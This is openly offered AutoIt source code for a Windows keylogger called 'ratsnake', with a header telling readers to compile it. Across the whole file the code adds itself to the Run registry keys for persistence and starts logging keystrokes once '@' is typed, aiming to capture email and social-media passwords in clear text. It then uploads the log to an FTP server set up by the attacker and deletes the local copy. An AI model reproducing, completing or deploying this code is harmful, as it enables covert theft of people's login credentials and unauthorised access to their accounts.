; ____ ____ _____ ____ _ ____ _ __ _____ ;/ __\/ _ \/__ __\/ ___\/ \ /|/ _ \/ |/ // __/ ;| \/|| / \| / \ | \| |\ ||| / \|| / | \ ;| /| |-|| | | \___ || | \||| |-||| \ | /_ ;\_/\_\\_/ \| \_/ \____/\_/ \|\_/ \|\_|\_\\____\ ;*************************************************** ;* File name: ratsnake.exe ( compile me ) * ;* language: Autoit * ;* Tested on: Windows 10 * ;* release: 0.1 * ;* Author: Emiliano Febbi * ;* Site: https://nullsite.altervista.org * ;* Date: 18/02/2025 * ;******************************************************************************************* ;* Description: * ;* Simple Keylogger for Windows written in Autoit. * ;* The keylogger is activated at system startup, * ;* but begins logging only when the email address is * ;* entered for a possible login ( ex. GMAIL , Facebook , Instagram ) in order to extract * ;* the password in clear text, and deactivates itself * ;* 30 seconds later to reactivate when the system is turned on again. * ;* The logs are sent to a designated FTP, so the credentials data must be filled in. * ;******************************************************************************************* #Include #include #include #include ;################################################################################# ;#Key registration and autorun compatible with Microsoft Edge , Chrome , Firefox # ;################################################################################# RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "klgr", "REG_SZ", "C:\Users\pc\Downloads\ratsnake.exe") RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "ratsnake", "REG_SZ", "C:\Users\pc\Desktop\ratsnake.exe") ;################## ;#FTP credentials # ;################## $server = 'ftp.yoursite.org' $username = 'ftp_user' $pass = 'ftp_password' $sendme = "r_logs.txt" If FileExists($sendme) Then ;################################# ;#FTP log management and sending # ;################################# $Open = _FTP_Open('MyFTP Control') $Conn = _FTP_Connect($Open, $server, $username, $pass) _FTP_FilePut($Conn, "r_logs.txt", "ratsnake_logs.txt") $Ftpc = _FTP_Close($Open) FileDelete("r_logs.txt") EndIf ;########################################### ;#Keylogger activation on accounts password# ;########################################### HotKeySet("@", "pressed") Dim $i = 0, $PushTime = 1000 ;############ ;#logs file # ;############ $file = FileOpen("r_logs.txt", 1) While 1 Sleep(100) WEnd Func pressed() $i += 1 Sleep($PushTime) Switch $i Case 1 put(1) Exit (0) EndSwitch $i = 0 EndFunc ;==>pressed Func put($y) $begin = TimerInit () While 1 ;############################ ;#set keylogger Timer 30secs# ;############################ $dif = TimerDiff ($begin) if $dif > 30000 then exitloop ;########## ;#logger..# ;########## If _IsPressed(41) Then _LogKeyPress("a") EndIf If _IsPressed(42) Then _LogKeyPress("b") EndIf If _IsPressed(43) Then _LogKeyPress("c") EndIf If _IsPressed(44) Then _LogKeyPress("d") EndIf If _IsPressed(45) Then _LogKeyPress("e") EndIf If _IsPressed(46) Then _LogKeyPress("f") EndIf If _IsPressed(47) Then _LogKeyPress("g") EndIf If _IsPressed(48) Then _LogKeyPress("h") EndIf If _IsPressed(49) Then _LogKeyPress("i") EndIf If _IsPressed('4a') Then _LogKeyPress("j") EndIf If _IsPressed('4b') Then _LogKeyPress("k") EndIf If _IsPressed('4c') Then _LogKeyPress("l") EndIf If _IsPressed('4d') Then _LogKeyPress("m") EndIf If _IsPressed('4e') = 1 Then _LogKeyPress("n") EndIf If _IsPressed('4f') Then _LogKeyPress("o") EndIf If _IsPressed(50) Then _LogKeyPress("p") EndIf If _IsPressed(51) Then _LogKeyPress("q") EndIf If _IsPressed(52) Then _LogKeyPress("r") EndIf If _IsPressed(53) Then _LogKeyPress("s") EndIf If _IsPressed(54) Then _LogKeyPress("t") EndIf If _IsPressed(55) Then _LogKeyPress("u") EndIf If _IsPressed(56) Then _LogKeyPress("v") EndIf If _IsPressed(57) Then _LogKeyPress("w") EndIf If _IsPressed(58) Then _LogKeyPress("x") EndIf If _IsPressed(59) Then _LogKeyPress("y") EndIf If _IsPressed('5a') Then _LogKeyPress("z") EndIf If _IsPressed('01') Then _LogKeyPress("LEFT MOUSE") EndIf If _IsPressed('02') Then _LogKeyPress("RIGHT MOUSE") EndIf If _IsPressed('08') Then _LogKeyPress("BACKSPACE") EndIf If _IsPressed('09') Then _LogKeyPress("TAB") EndIf If _IsPressed('0d') Then _LogKeyPress("ENTER") EndIf If _IsPressed('10') Then _LogKeyPress("SHIFT") EndIf If _IsPressed('11') Then _LogKeyPress("CTRL") EndIf If _IsPressed('12') Then _LogKeyPress("ALT") EndIf If _IsPressed('13') Then _LogKeyPress("PAUSE") EndIf If _IsPressed('14') Then _LogKeyPress("CAPSLOCK") EndIf If _IsPressed('1b') Then _LogKeyPress("ESC") EndIf If _IsPressed('20') Then _LogKeyPress("SPACE") EndIf If _IsPressed('21') Then _LogKeyPress("PGUP") EndIf If _IsPressed('22') Then _LogKeyPress("PGDOWN") EndIf If _IsPressed('23') Then _LogKeyPress("END") EndIf If _IsPressed('24') Then _LogKeyPress("HOME") EndIf If _IsPressed('25') Then _LogKeyPress("LEFT ARROW") EndIf If _IsPressed('26') Then _LogKeyPress("UP ARROW") EndIf If _IsPressed('27') Then _LogKeyPress("RIGHT ARROW") EndIf If _IsPressed('28') Then _LogKeyPress("DOWN ARROW") EndIf If _IsPressed('2c') Then _LogKeyPress("PRNTSCRN") EndIf If _IsPressed('2d') Then _LogKeyPress("INSERT") EndIf If _IsPressed('2e') Then _LogKeyPress("DEL") EndIf If _IsPressed('30') Then _LogKeyPress("0") EndIf If _IsPressed('31') Then _LogKeyPress("1") EndIf If _IsPressed('32') Then _LogKeyPress("2") EndIf If _IsPressed('33') Then _LogKeyPress("3") EndIf If _IsPressed('34') Then _LogKeyPress("4") EndIf If _IsPressed('35') Then _LogKeyPress("5") EndIf If _IsPressed('36') Then _LogKeyPress("6") EndIf If _IsPressed('37') Then _LogKeyPress("7") EndIf If _IsPressed('38') Then _LogKeyPress("8") EndIf If _IsPressed('39') Then _LogKeyPress("9") EndIf ;###################### ;#Special Chars logger# ;###################### If _IsPressed('A0') And _IsPressed('30') Then _LogKeyPress(")") EndIf If _IsPressed('A0') And _IsPressed('31') Then _LogKeyPress("!") EndIf If _IsPressed('A0') And _IsPressed('32') Then _LogKeyPress("@") EndIf If _IsPressed('A0') And _IsPressed('33') Then _LogKeyPress("#") EndIf If _IsPressed('A0') And _IsPressed('34') Then _LogKeyPress("$") EndIf If _IsPressed('A0') And _IsPressed('35') Then _LogKeyPress("%") EndIf If _IsPressed('A0') And _IsPressed('36') Then _LogKeyPress("^") EndIf If _IsPressed('A0') And _IsPressed('37') Then _LogKeyPress("&") EndIf If _IsPressed('A0') And _IsPressed('38') Then _LogKeyPress("*") EndIf If _IsPressed('A0') And _IsPressed('39') Then _LogKeyPress("(") EndIf If _IsPressed('A0') And _IsPressed('BA') Then _LogKeyPress(":") EndIf If _IsPressed('A0') And _IsPressed('BB') Then _LogKeyPress("+") EndIf If _IsPressed('A0') And _IsPressed('BC') Then _LogKeyPress("<") EndIf If _IsPressed('A0') And _IsPressed('BD') Then _LogKeyPress("_") EndIf If _IsPressed('A0') And _IsPressed('BE') Then _LogKeyPress(">") EndIf If _IsPressed('A0') And _IsPressed('BF') Then _LogKeyPress("?") EndIf If _IsPressed('A0') And _IsPressed('C0') Then _LogKeyPress("~") EndIf If _IsPressed('A0') And _IsPressed('DB') Then _LogKeyPress("{") EndIf If _IsPressed('A0') And _IsPressed('DC') Then _LogKeyPress("|") EndIf If _IsPressed('A0') And _IsPressed('DD') Then _LogKeyPress("}") EndIf If _IsPressed('A0') And _IsPressed('DE') Then _LogKeyPress('"') EndIf WEnd Sleep(50) EndFunc ;==>put ;################### ;#File logs writing# ;################### Func _LogKeyPress($what2log) FileWriteLine($file, "[ " &@MDAY & ". " &@MON & ". " &@YEAR & " " &@HOUR & ":" &@MIN & ":" &@SEC & " ] " & "Pressed Button: " & $what2log) sleep ("150") EndFunc FileClose($file) Func MyExit () Exit EndFunc